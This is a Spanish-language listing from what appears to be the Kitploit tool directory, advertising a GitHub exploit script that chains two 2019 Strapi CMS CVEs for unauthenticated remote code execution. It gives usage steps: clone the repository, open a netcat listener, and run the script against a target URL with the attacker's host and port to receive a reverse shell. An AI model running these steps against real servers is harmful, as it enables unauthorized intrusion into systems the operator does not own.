Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Strapi-RCE — Script de exploit que muestra una combinación de CVE-2019-18818 y CVE-2019-19609 para ejecución remota de código no autenticada en Strapi CMS. | Kitploit
Herramientas/GitHubGitHub/hackhoven/strapi-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubhackhoven/strapi-rce

Strapi-RCE

Script de exploit que muestra una combinación de CVE-2019-18818 y CVE-2019-19609 para ejecución remota de código no autenticada en Strapi CMS.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Strapi-RCE

Script de explotación que muestra una combinación de CVE-2019-18818 y CVE-2019-19609 para la ejecución remota de código no autenticada en Strapi CMS.

Exploit

Este script explota una vulnerabilidad en Strapi CMS versiones 3.0.0-beta.17.4 y anteriores, permitiendo la ejecución remota de código no autenticada.

Descripción

El exploit funciona aprovechando primero una vulnerabilidad en el restablecimiento de contraseña para obtener un JSON Web Token (JWT) de un usuario administrativo. Luego, este token se utiliza para enviar un payload malicioso al Strapi CMS, que desencadena una shell inversa hacia la máquina del atacante.

Cómo Usar

  1. Clonar el repositorio:

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. Navegar al directorio

    root@kitploit:~
    cd Strapi-RCE/
    
  3. Configurar un Listener de Netcat

    root@kitploit:~
    nc -nlvp <LPORT>
    
  4. Ejecutar el script con la URL objetivo, la dirección IP del host local y el puerto del host local como argumentos

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    

Descargo de responsabilidad

Este script está destinado únicamente a fines educativos. El autor no aprueba ni apoya el uso de este script para actividades ilegales o no éticas. Este script solo debe usarse en entornos legales de investigación de seguridad o CTF. Úselo bajo su propio riesgo.


Hecho por Hackhoven

Descargar herramienta